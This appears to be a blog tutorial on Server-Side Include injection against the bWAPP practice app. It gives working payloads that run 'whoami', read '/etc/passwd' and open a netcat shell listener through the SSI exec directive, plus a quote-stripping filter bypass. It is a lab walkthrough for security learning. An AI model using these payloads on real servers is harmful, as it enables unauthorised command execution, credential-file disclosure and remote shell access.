bWAPP – Server-Side Include (SSI) Injection

What is SSI?

It is a server-side scripting language that is used on the web.

It is supported by Apache, nginx & Microsoft ISS.


It uses the extensions; .shtml, .stm, .shtm


SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.


It is commonly used to save time when developing web apps with dynamic content.


SSI directive characters

< ! # = / . ” – > and [a-zA-Z0-9]


Common directives

  • Include – allows the content of one document to be transcluded into another. The parameter will specify the file to be included (file)
  • Exec – This directive executes a program, script or shell on the server. The cmd parameter specifies a server side command.



<!–#command <parameter>=”value”–>

Example: <!–#exec cmd=”whoami” –>


What is server-side includes Injection?

The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields.


Analyzing the web application

  • Check if the web app is properly validating the various input fields, by testing the characters that are used in the SSI directives.
  • < ! # = / . ” – > and [a-zA-Z0-9]


Analyzing the POST request

  • Send test data to see the result
  • Analyze the POST request



  • With the security on low, we can test a standard SSI command with all SSI directive characters.
  • Execute OS commands:
    • <!–#exec cmd=”whoami” –>  –System info

    • <!–#exec cmd=”cat /etc/passwd” –> passwsd file

  • Reverse Shell
    • 1st entry: Reverse Shell

    • <!–#exec cmd=”nc -lvp 1234 -e /bin/bash” –>



  • Test previous commands – There is some data validation for some SSI specific directives.
  • The first we can try is the quotation marks from the commands.
  • <!–#exec cmd=ls –>

Liked it? Take a second to support Alexis on Patreon!
Share this post

One thought on “bWAPP – Server-Side Include (SSI) Injection

Leave a Reply

Your email address will not be published. Required fields are marked *